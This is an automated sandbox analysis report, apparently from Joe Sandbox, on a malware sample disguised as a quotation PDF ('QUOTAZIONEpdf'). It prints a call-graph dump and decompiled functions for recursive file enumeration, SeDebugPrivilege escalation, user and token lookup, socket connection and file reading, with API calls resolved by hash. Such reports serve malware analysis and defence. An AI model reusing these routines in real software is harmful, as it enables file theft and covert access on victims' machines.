API calls 8212->8214 8215 404183 8213->8215 8253 403c90 8213->8253 8221 404105 8214->8221 8215->8185 8215->8189 8215->8190 8218 40416d 8250 403c40 
8218->8250 8221->8218 8225 4031e5 4 API calls 8221->8225 8223 4040bb 9 API calls 8226 4041c8 8223->8226 8224 402bab 2 API calls 8224->8215 8227 404131 VirtualAlloc 8225->8227 8226->8224 8227->8218 8228 404142 8227->8228 8229 4031e5 4 API calls 8228->8229 8230 40414f ReadFile 8229->8230 8230->8218 8231 404160 8230->8231 8232 4031e5 4 API calls 8231->8232 8232->8218 8234 4031e5 4 API calls 8233->8234 8235 403fb1 VirtualFree 8234->8235 8235->8185 8237 4031e5 4 API calls 8236->8237 8238 40563a 8237->8238 8239 405872 8238->8239 8241 405881 8239->8241 8240 4058bc 8243 405797 4 API calls 8240->8243 8244 4058af 8240->8244 8241->8240 8300 4058d4 8241->8300 8243->8244 8244->8191 8246 405781 4 API calls 8246->8240 8248 405781 4 API calls 8247->8248 8249 405770 8248->8249 8249->8197 8251 4031e5 4 API calls 8250->8251 8252 403c52 FindCloseChangeNotification 8251->8252 8252->8215 8254 403ca3 8253->8254 8257 403caa 8253->8257 8280 405dc5 8254->8280 8256 404056 6 API calls 8258 403cbe 8256->8258 8257->8256 8259 403d3a 8257->8259 8260 403d2e 8258->8260 8261 403d17 8258->8261 8262 403ccf 8258->8262 8259->8215 8276 403c59 8259->8276 8260->8259 8263 402bab 2 API calls 8260->8263 8264 405b6f 6 API calls 8261->8264 8265 405b6f 6 API calls 8262->8265 8263->8259 8267 403d14 8264->8267 8266 403cdd 8265->8266 8268 405b6f 6 API calls 8266->8268 8269 402bab 2 API calls 8267->8269 8270 403cee 8268->8270 8269->8260 8270->8267 8285 403d4d 8270->8285 8273 403d0b 8275 402bab 2 API calls 8273->8275 8275->8267 8277 403c21 8276->8277 8278 4031e5 4 API calls 8277->8278 8279 403c33 8278->8279 8279->8223 8279->8226 8294 406799 8280->8294 8282 405dd5 8283 402b7c 2 API calls 8282->8283 8284 405dfe 8283->8284 8284->8257 8297 403bb7 8285->8297 8287 403cfe 8287->8273 8288 403c62 8287->8288 8289 403d4d 5 API calls 8288->8289 8290 403c6d 8289->8290 8291 403c72 8290->8291 8292 4031e5 4 API calls 8290->8292 8291->8273 8293 403c87 CreateDirectoryW 8292->8293 8293->8273 8295 4031e5 4 API calls 8294->8295 8296 
4067ad 8295->8296 8296->8282 8298 4031e5 4 API calls 8297->8298 8299 403bc9 GetFileAttributesW 8298->8299 8299->8287 8301 405797 4 API calls 8300->8301 8302 4058a8 8301->8302 8302->8244 8302->8246 8304 4031e5 4 API calls 8303->8304 8305 403baa 8304->8305 8305->8134 8305->8136 9742 40ebc6 9743 4040bb 12 API calls 9742->9743 9744 40ebdf 9743->9744 9745 40ecd7 9744->9745 9762 407795 9744->9762 9748 40eccd 9750 403f9e 5 API calls 9748->9750 9749 4056bf 2 API calls 9760 40ec12 9749->9760 9750->9745 9751 40ecb5 9752 402bab 2 API calls 9751->9752 9753 40ecbd 9752->9753 9754 413aca 4 API calls 9753->9754 9755 40ecc7 9754->9755 9757 405695 2 API calls 9755->9757 9756 407908 GetProcessHeap RtlAllocateHeap 9756->9760 9757->9748 9758 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlFreeHeap 9758->9760 9760->9751 9760->9756 9760->9758 9761 402bab GetProcessHeap RtlFreeHeap 9760->9761 9773 412269 9760->9773 9761->9760 9764 4077ab 9762->9764 9763 4077b3 9763->9748 9763->9749 9764->9763 9780 405ae9 9764->9780 9766 4077e1 9766->9763 9767 407802 9766->9767 9768 4077f8 9766->9768 9770 402b7c 2 API calls 9767->9770 9769 402bab 2 API calls 9768->9769 9769->9763 9771 407811 9770->9771 9772 402bab 2 API calls 9771->9772 9772->9763 9796 40374e 9773->9796 9776 412299 9776->9760 9779 402bab 2 API calls 9779->9776 9781 405af7 9780->9781 9782 402b7c 2 API calls 9781->9782 9783 405b03 9782->9783 9792 405b5a 9783->9792 9793 405998 9783->9793 9785 405b21 9786 405b61 9785->9786 9787 402b7c 2 API calls 9785->9787 9788 402bab 2 API calls 9786->9788 9789 405b39 9787->9789 9788->9792 9789->9786 9790 405b40 9789->9790 9791 402bab 2 API calls 9790->9791 9791->9792 9792->9766 9794 4031e5 4 API calls 9793->9794 9795 4059ab 9794->9795 9795->9785 9797 402b7c 2 API calls 9796->9797 9798 40375f 9797->9798 9799 4031e5 4 API calls 9798->9799 9802 4037a3 9798->9802 9800 40378f 9799->9800 9801 402bab 2 API calls 9800->9801 9800->9802 9801->9802 9802->9776 9803 4037be 9802->9803 9804 4031e5 4 API calls 
9803->9804 9805 4037e2 9804->9805 9806 40382b 9805->9806 9807 402b7c 2 API calls 9805->9807 9806->9779 9808 403802 9807->9808 9809 403832 9808->9809 9811 403809 9808->9811 9810 4036a3 4 API calls 9809->9810 9810->9806 9812 4036a3 4 API calls 9811->9812 9812->9806 8903 410cd1 8908 412093 8903->8908 8906 412093 20 API calls 8907 410cff 8906->8907 8910 4120a5 8908->8910 8929 410cf1 8908->8929 8909 4120b3 8911 404056 6 API calls 8909->8911 8910->8909 8914 412100 8910->8914 8912 4120ba 8911->8912 8913 405b6f 6 API calls 8912->8913 8915 412152 8912->8915 8912->8929 8916 412125 8913->8916 8918 403fbf 7 API calls 8914->8918 8914->8929 8930 403d74 8915->8930 8916->8915 8921 412139 8916->8921 8922 41214d 8916->8922 8918->8912 8920 41218c 8926 402bab 2 API calls 8920->8926 8920->8929 8925 402bab 2 API calls 8921->8925 8924 402bab 2 API calls 8922->8924 8923 402bab 2 API calls 8923->8920 8924->8915 8927 41213e 8925->8927 8926->8929 8928 402bab 2 API calls 8927->8928 8928->8929 8929->8906 8931 403d87 8930->8931 8932 403ea3 8931->8932 8933 405b6f 6 API calls 8931->8933 8934 405b6f 6 API calls 8932->8934 8935 403da3 8933->8935 8936 403eb9 8934->8936 8935->8932 8937 4031e5 4 API calls 8935->8937 8938 4031e5 4 API calls 8936->8938 8945 403f6f 8936->8945 8939 403dbc FindFirstFileW 8937->8939 8940 403ed3 FindFirstFileW 8938->8940 8952 403e9c 8939->8952 8961 403dd1 8939->8961 8944 403ee8 8940->8944 8959 403f8d 8940->8959 8941 402bab 2 API calls 8941->8945 8942 402bab 2 API calls 8942->8932 8943 4031e5 4 API calls 8946 403e84 FindNextFileW 8943->8946 8949 405b6f 6 API calls 8944->8949 8950 4031e5 4 API calls 8944->8950 8955 403f75 8944->8955 8963 402bab 2 API calls 8944->8963 8973 40fa23 8944->8973 8945->8920 8945->8923 8947 403e96 8946->8947 8946->8961 8970 403bef 8947->8970 8949->8944 8951 403f50 FindNextFileW 8950->8951 8951->8944 8954 403f87 8951->8954 8952->8942 8953 405b6f 6 API calls 8953->8961 8956 403bef 5 API calls 8954->8956 8957 402bab 2 API calls 8955->8957 8956->8959 8960 
403f7b 8957->8960 8958 403d74 15 API calls 8958->8961 8959->8941 8962 403bef 5 API calls 8960->8962 8961->8943 8961->8953 8961->8958 8964 402bab 2 API calls 8961->8964 8965 403f63 8961->8965 8962->8945 8963->8944 8964->8961 8966 402bab 2 API calls 8965->8966 8967 403f69 8966->8967 8968 403bef 5 API calls 8967->8968 8968->8945 8971 4031e5 4 API calls 8970->8971 8972 403c01 FindClose 8971->8972 8972->8952 8974 40fa39 8973->8974 8975 410293 8974->8975 8976 405b6f 6 API calls 8974->8976 8975->8944 8977 40ffcc 8976->8977 8977->8975 8978 4040bb 12 API calls 8977->8978 8979 40ffeb 8978->8979 8980 41028c 8979->8980 8983 402b7c 2 API calls 8979->8983 9028 41027d 8979->9028 8981 402bab 2 API calls 8980->8981 8981->8975 8982 403f9e 5 API calls 8982->8980 8984 41001e 8983->8984 8985 40a423 4 API calls 8984->8985 8984->9028 8986 41004a 8985->8986 8987 4031e5 4 API calls 8986->8987 8988 41005c 8987->8988 8989 4031e5 4 API calls 8988->8989 8990 410079 8989->8990 8991 4031e5 4 API calls 8990->8991 8992 410096 8991->8992 8993 4031e5 4 API calls 8992->8993 8994 4100b0 8993->8994 8995 4031e5 4 API calls 8994->8995 8996 4100cd 8995->8996 8997 4031e5 4 API calls 8996->8997 8998 4100ea 8997->8998 9029 412516 8998->9029 9000 4100fd 9001 40642c 5 API calls 9000->9001 9002 41013e 9001->9002 9003 410142 9002->9003 9004 41019f 9002->9004 9005 40488c 5 API calls 9003->9005 9007 4031e5 4 API calls 9004->9007 9006 410151 9005->9006 9009 41019c 9006->9009 9010 404866 4 API calls 9006->9010 9021 4101bb 9007->9021 9008 41022a 9018 413a58 13 API calls 9008->9018 9009->9008 9011 40642c 5 API calls 9009->9011 9012 410163 9010->9012 9013 410201 9011->9013 9017 406c4c 6 API calls 9012->9017 9026 41018e 9012->9026 9015 410205 9013->9015 9016 41022f 9013->9016 9014 403c40 5 API calls 9014->9009 9019 4126a7 7 API calls 9015->9019 9032 4125db 9016->9032 9022 410178 9017->9022 9023 41026e 9018->9023 9019->9008 9024 4031e5 4 API calls 9021->9024 9025 406c4c 6 API calls 9022->9025 9027 402bab 2 API calls 
9023->9027 9024->9009 9025->9026 9026->9014 9027->9028 9028->8982 9030 4031e5 4 API calls 9029->9030 9031 412539 9030->9031 9031->9000 9033 40488c 5 API calls 9032->9033 9034 4125ec 9033->9034 9035 41269f 9034->9035 9036 4031e5 4 API calls 9034->9036 9035->9008 9037 412609 9036->9037 9039 4031e5 4 API calls 9037->9039 9044 41268f 9037->9044 9038 403c40 5 API calls 9038->9035 9040 41262a 9039->9040 9048 412675 9040->9048 9049 4124f1 9040->9049 9042 4031e5 4 API calls 9042->9044 9044->9038 9045 412663 9047 4031e5 4 API calls 9045->9047 9046 4124f1 4 API calls 9046->9045 9047->9048 9048->9042 9050 4031e5 4 API calls 9049->9050 9051 412503 9050->9051 9051->9045 9051->9046 9238 4049dc 9239 4031e5 4 API calls 9238->9239 9240 4049ef 9239->9240 9895 40cddd 9896 405b6f 6 API calls 9895->9896 9897 40cdee 9896->9897 9898 40ce06 9897->9898 9899 413a58 13 API calls 9897->9899 9900 405b6f 6 API calls 9898->9900 9907 40ce59 9898->9907 9901 40ce00 9899->9901 9903 40ce1c 9900->9903 9902 402bab 2 API calls 9901->9902 9902->9898 9904 403d74 19 API calls 9903->9904 9903->9907 9909 40ce52 9903->9909 9906 40ce45 9904->9906 9905 402bab 2 API calls 9905->9907 9908 402bab 2 API calls 9906->9908 9906->9909 9908->9909 9909->9905 9241 40ecde 9242 412093 20 API calls 9241->9242 9243 40ecfd 9242->9243 9244 412093 20 API calls 9243->9244 9245 40ed0d 9244->9245 9249 40e8df 9250 412093 20 API calls 9249->9250 9251 40e8f8 9250->9251 9252 412093 20 API calls 9251->9252 9253 40e908 9252->9253 9260 404b22 9253->9260 9255 40e91c 9256 40e936 9255->9256 9259 40e93d 9255->9259 9267 40e944 9255->9267 9258 402bab 2 API calls 9256->9258 9258->9259 9261 402b7c 2 API calls 9260->9261 9262 404b33 9261->9262 9266 404b66 9262->9266 9276 4049b3 9262->9276 9265 402bab 2 API calls 9265->9266 9266->9255 9268 4056bf 2 API calls 9267->9268 9269 40e952 9268->9269 9270 40e976 9269->9270 9271 4057df 13 API calls 9269->9271 9270->9256 9272 40e966 9271->9272 9273 413aca 4 API calls 9272->9273 9274 40e970 9273->9274 9275 

                Executed Functions

                C-Code - Quality: 85%
                			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                				struct _WIN32_FIND_DATAW _v596;
                				void* __ebx;
                				void* _t35;
                				int _t43;
                				void* _t52;
                				int _t56;
                				intOrPtr _t60;
                				void* _t66;
                				void* _t73;
                				void* _t74;
                				WCHAR* _t98;
                				void* _t99;
                				void* _t100;
                				void* _t101;
                				WCHAR* _t102;
                				void* _t103;
                				void* _t104;
                
                				L004067C4(0xa); // executed
                				_t72 = 0;
                				_t100 = 0x2e;
                				_t106 = _a16;
                				if(_a16 == 0) {
                					L15:
                					_push(_a8);
                					_t98 = E00405B6F(0, L"%s\\%s", _a4);
                					_t104 = _t103 + 0xc;
                					if(_t98 == 0) {
                						L30:
                						__eflags = 0;
                						return 0;
                					}
                					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
                					_t35 = FindFirstFileW(_t98,  &_v596); // executed
                					_t73 = _t35;
                					if(_t73 == 0xffffffff) {
                						L29:
                						E00402BAB(_t98);
                						goto L30;
                					}
                					L17:
                					while(1) {
                						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
                							if(_v596.dwFileAttributes != 0x10) {
                								L21:
                								_push( &(_v596.cFileName));
                								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
                								_t104 = _t104 + 0xc;
                								if(_t101 == 0) {
                									goto L24;
                								}
                								if(_a12 == 0) {
                									E00402BAB(_t98);
                									E00403BEF(_t73);
                									return _t101;
                								}
                								_a12(_t101);
                								E00402BAB(_t101);
                								goto L24;
                							}
                							_t124 = _a20;
                							if(_a20 == 0) {
                								goto L24;
                							}
                							goto L21;
                						} else {
                							L24:
                							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
                							_t43 = FindNextFileW(_t73,  &_v596); // executed
                							if(_t43 == 0) {
                								E00403BEF(_t73); // executed
                								goto L29;
                							}
                							_t100 = 0x2e;
                							continue;
                						}
                					}
                				}
                				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
                				if(_t102 == 0) {
                					L14:
                					_t100 = 0x2e;
                					goto L15;
                				}
                				E004031E5(0, 0, 0xd4f4acea, 0, 0);
                				_t52 = FindFirstFileW(_t102,  &_v596); // executed
                				_t74 = _t52;
                				if(_t74 == 0xffffffff) {
                					L13:
                					E00402BAB(_t102);
                					_t72 = 0;
                					goto L14;
                				} else {
                					goto L3;
                				}
                				do {
                					L3:
                					if((_v596.dwFileAttributes & 0x00000010) == 0) {
                						goto L11;
                					}
                					if(_a24 == 0) {
                						L7:
                						if(E00405D24( &(_v596.cFileName)) >= 3) {
                							L9:
                							_push( &(_v596.cFileName));
                							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
                							_t103 = _t103 + 0xc;
                							_a16 = _t60;
                							_t115 = _t60;
                							if(_t60 == 0) {
                								goto L11;
                							}
                							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
                							E00402BAB(_a16);
                							_t103 = _t103 + 0x1c;
                							if(_t99 != 0) {
                								E00402BAB(_t102);
                								E00403BEF(_t74);
                								return _t99;
                							}
                							goto L11;
                						}
                						_t66 = 0x2e;
                						_t114 = _v596.cFileName - _t66;
                						if(_v596.cFileName == _t66) {
                							goto L11;
                						}
                						goto L9;
                					}
                					_push(L"Windows");
                					if(E00405EFF( &(_v596.cFileName)) != 0) {
                						goto L11;
                					}
                					_push(L"Program Files");
                					if(E00405EFF( &(_v596.cFileName)) != 0) {
                						goto L11;
                					}
                					goto L7;
                					L11:
                					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
                					_t56 = FindNextFileW(_t74,  &_v596); // executed
                				} while (_t56 != 0);
                				E00403BEF(_t74); // executed
                				goto L13;
                			}





















                APIs
                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileFind$FirstNext
                • String ID: %s\%s$%s\*$Program Files$Windows
                • API String ID: 1690352074-2009209621
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 78%
                			E0040650A(void* __eax, void* __ebx, void* __eflags) {
                				void* _v8;
                				struct _LUID _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				struct _TOKEN_PRIVILEGES _v32;
                				intOrPtr* _t13;
                				void* _t14;
                				int _t16;
                				int _t31;
                				void* _t32;
                
                				_t31 = 0;
                				E004060AC();
                				_t32 = __eax;
                				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                				_t14 =  *_t13(_t32, 0x28,  &_v8);
                				if(_t14 != 0) {
                					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
                					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
                					if(_t16 != 0) {
                						_push(__ebx);
                						_v32.Privileges = _v16.LowPart;
                						_v32.PrivilegeCount = 1;
                						_v24 = _v16.HighPart;
                						_v20 = 2;
                						E004031E5(1, 9, 0xc1642df2, 0, 0);
                						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
                						_t31 =  !=  ? 1 : 0;
                					}
                					E00403C40(_v8);
                					return _t31;
                				}
                				return _t14;
                			}














                APIs
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                Similarity
                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                • String ID: SeDebugPrivilege
                • API String ID: 3615134276-2896544425
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00402B7C(long _a4) {
                				void* _t4;
                				void* _t7;
                
                				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
                				_t7 = _t4;
                				if(_t7 != 0) {
                					E00402B4E(_t7, 0, _a4);
                				}
                				return _t7;
                			}






                APIs
                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                Similarity
                • API ID: Heap$AllocateProcess
                • String ID:
                • API String ID: 1357844191-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00406069(WCHAR* _a4, DWORD* _a8) {
                				int _t4;
                				void* _t5;
                
                				E004031E5(_t5, 9, 0xd4449184, 0, 0);
                				_t4 = GetUserNameW(_a4, _a8); // executed
                				return _t4;
                			}






                APIs
                • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                Similarity
                • API ID: NameUser
                • String ID:
                • API String ID: 2645101109-0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                Similarity
                • API ID: recv
                • String ID:
                • API String ID: 1507349165-0
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 75%
                			E004061C3(void* __eax, void* __ebx, void* __eflags) {
                				int _v8;
                				long _v12;
                				int _v16;
                				int _v20;
                				char _v24;
                				char _v28;
                				char _v32;
                				intOrPtr* _t25;
                				int _t27;
                				int _t30;
                				int _t31;
                				int _t36;
                				int _t37;
                				intOrPtr* _t39;
                				int _t40;
                				void* _t41;
                				long _t44;
                				intOrPtr* _t45;
                				int _t46;
                				void* _t48;
                				int _t49;
                				void* _t67;
                				void* _t68;
                				void* _t74;
                
                				_t48 = __ebx;
                				_t67 = 0;
                				_v8 = 0;
                				E00402BF2();
                				_t68 = __eax;
                				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
                				_t2 =  &_v8; // 0x414449
                				_push(1);
                				_push(8);
                				_push(_t68);
                				if( *_t25() != 0) {
                					L4:
                					_t27 = E00402B7C(0x208);
                					_v20 = _t27;
                					__eflags = _t27;
                					if(_t27 != 0) {
                						E0040338C(_t27, _t67, 0x104);
                						_t74 = _t74 + 0xc;
                					}
                					_push(_t48);
                					_t49 = E00402B7C(0x208);
                					__eflags = _t49;
                					if(_t49 != 0) {
                						E0040338C(_t49, _t67, 0x104);
                						_t74 = _t74 + 0xc;
                					}
                					_v28 = 0x208;
                					_v24 = 0x208;
                					_t7 =  &_v8; // 0x414449
                					_v12 = _t67;
                					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
                					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
                					__eflags = _t30;
                					if(_t30 == 0) {
                						_t36 = E00402B7C(_v12);
                						_v16 = _t36;
                						__eflags = _t36;
                						if(_t36 != 0) {
                							_t14 =  &_v8; // 0x414449, executed
                							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
                							__eflags = _t37;
                							if(_t37 != 0) {
                								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
                								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
                								__eflags = _t40;
                								if(__eflags != 0) {
                									_t41 = E00405B6F(__eflags, L"%s", _t49); // executed
                									_t67 = _t41;
                								}
                							}
                							E00402BAB(_v16);
                						}
                					}
                					__eflags = _v8;
                					if(_v8 != 0) {
                						E00403C40(_v8); // executed
                					}
                					__eflags = _t49;
                					if(_t49 != 0) {
                						E00402BAB(_t49);
                					}
                					_t31 = _v20;
                					__eflags = _t31;
                					if(_t31 != 0) {
                						E00402BAB(_t31);
                					}
                					return _t67;
                				}
                				_t44 = GetLastError();
                				if(_t44 == 0x3f0) {
                					E004060AC();
                					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
                					_t3 =  &_v8; // 0x414449
                					_t46 =  *_t45(_t44, 8, _t3);
                					__eflags = _t46;
                					if(_t46 == 0) {
                						goto L2;
                					}
                					goto L4;
                				}
                				L2:
                				return 0;
                			}

                APIs
                • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                • _wmemset.LIBCMT ref: 00406244
                • _wmemset.LIBCMT ref: 00406261
                • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: _wmemset$ErrorInformationLastToken
                • String ID: IDA$IDA
                • API String ID: 487585393-2020647798
                • Opcode ID: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                • Opcode Fuzzy Hash: 361f5901e0b8fd221317340a43d44222897358287ed0cab1ee46ebfb6b6b92c4
                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                C-Code - Quality: 37%
                			E00404E17(intOrPtr _a4, intOrPtr _a8) {
                				signed int _v8;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				void _v40;
                				void* _t23;
                				signed int _t24;
                				signed int* _t25;
                				signed int _t30;
                				signed int _t31;
                				signed int _t33;
                				signed int _t41;
                				void* _t42;
                				signed int* _t43;
                
                				_v8 = _v8 & 0x00000000;
                				_t33 = 8;
                				memset( &_v40, 0, _t33 << 2);
                				_v32 = 1;
                				_t23 =  &_v40;
                				_v28 = 6;
                				_v36 = 2;
                				__imp__getaddrinfo(_a4, _a8, _t23,  &_v8); // executed
                				if(_t23 == 0) {
                					_t24 = E00402B7C(4);
                					_t43 = _t24;
                					_t31 = _t30 | 0xffffffff;
                					 *_t43 = _t31;
                					_t41 = _v8;
                					__imp__#23( *((intOrPtr*)(_t41 + 4)),  *((intOrPtr*)(_t41 + 8)),  *((intOrPtr*)(_t41 + 0xc)), _t42, _t30); // executed
                					 *_t43 = _t24;
                					if(_t24 != _t31) {
                						__imp__#4(_t24,  *((intOrPtr*)(_t41 + 0x18)),  *((intOrPtr*)(_t41 + 0x10))); // executed
                						if(_t24 == _t31) {
                							E00404DE5(_t24,  *_t43);
                							 *_t43 = _t31;
                						}
                						__imp__freeaddrinfo(_v8);
                						if( *_t43 != _t31) {
                							_t25 = _t43;
                							goto L10;
                						} else {
                							E00402BAB(_t43);
                							L8:
                							_t25 = 0;
                							L10:
                							return _t25;
                						}
                					}
                					E00402BAB(_t43);
                					__imp__freeaddrinfo(_v8);
                					goto L8;
                				}
                				return 0;
                			}

                APIs
                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                • socket.WS2_32(?,?,?), ref: 00404E7A
                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                Memory Dump Source
                • Source File: 00000002.00000002.555947700.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.555985453.00000000004A0000.00000040.00000001.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_QUOTAZIONEpdf.jbxd
                Yara matches
                Similarity
                • API ID: freeaddrinfogetaddrinfosocket
                • String ID:
                • API String ID: 2479546573-0
                • Opcode ID: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                • Opcode Fuzzy Hash: e22eb4597c528fad89aa2306bbf5fab64752e69decfa66c962aefb5bd8f8ada5
                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                C-Code - Quality: 74%
                			E004040BB(void* __eflags, WCHAR* _a4, long* _a8, intOrPtr _a12) {
                				struct _SECURITY_ATTRIBUTES* _v8;
                				char _v12;
                				long _v16;
                				void* __ebx;
                				void* __edi;
                				void* _t16;
                				intOrPtr* _t25;
                				long* _t28;
                				void* _t30;
                				int _t32;
                				intOrPtr* _t33;
                				void* _t35;
                				void* _t42;
                				intOrPtr _t43;
                				long _t44;
                				struct _OVERLAPPED* _t46;
                
                				_t46 = 0;
                				_t35 = 0;
                				E004031E5(0, 0, 0xe9fabb88, 0, 0);
                				_t16 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                				_t42 = _t16;
                				_v8 = _t42;
                				if(_t42 == 0xffffffff) {
                					__eflags = _a12;
                					if(_a12 == 0) {
                						L10:
                						return _t35;
                					}
                					_t43 = E00403C90(_t42, L".tmp", 0, 0, 0x1a);
                					__eflags = _t43;
                					if(_t43 == 0) {
                						goto L10;
                					}
                					_push(0);
                					__eflags = E00403C59(_a4, _t43);
                					if(__eflags != 0) {
                						_v8 = 0;
                						_t46 = E004040BB(__eflags, _t43,  &_v8, 0);
                						_push(_t43);
                						 *_a8 = _v8;
                						E00403D44();
                					}
                					E00402BAB(_t43);
                					return _t46;
                				}
                				_t25 = E004031E5(0, 0, 0xf9435d1e, 0, 0);
                				_t44 =  *_t25(_t42,  &_v12);
                				if(_v12 != 0 || _t44 > 0x40000000) {
                					L8:
                					_t45 = _v8;
                					goto L9;
                				} else {
                					_t28 = _a8;
                					if(_t28 != 0) {
                						 *_t28 = _t44;
                					}
                					E004031E5(_t35, _t46, 0xd4ead4e2, _t46, _t46);
                					_t30 = VirtualAlloc(_t46, _t44, 0x1000, 4); // executed
                					_t35 = _t30;
                					if(_t35 == 0) {
                						goto L8;
                					} else {
                						E004031E5(_t35, _t46, 0xcd0c9940, _t46, _t46);
                						_t45 = _v8;
                						_t32 = ReadFile(_v8, _t35, _t44,  &_v16, _t46); // executed
                						if(_t32 == 0) {
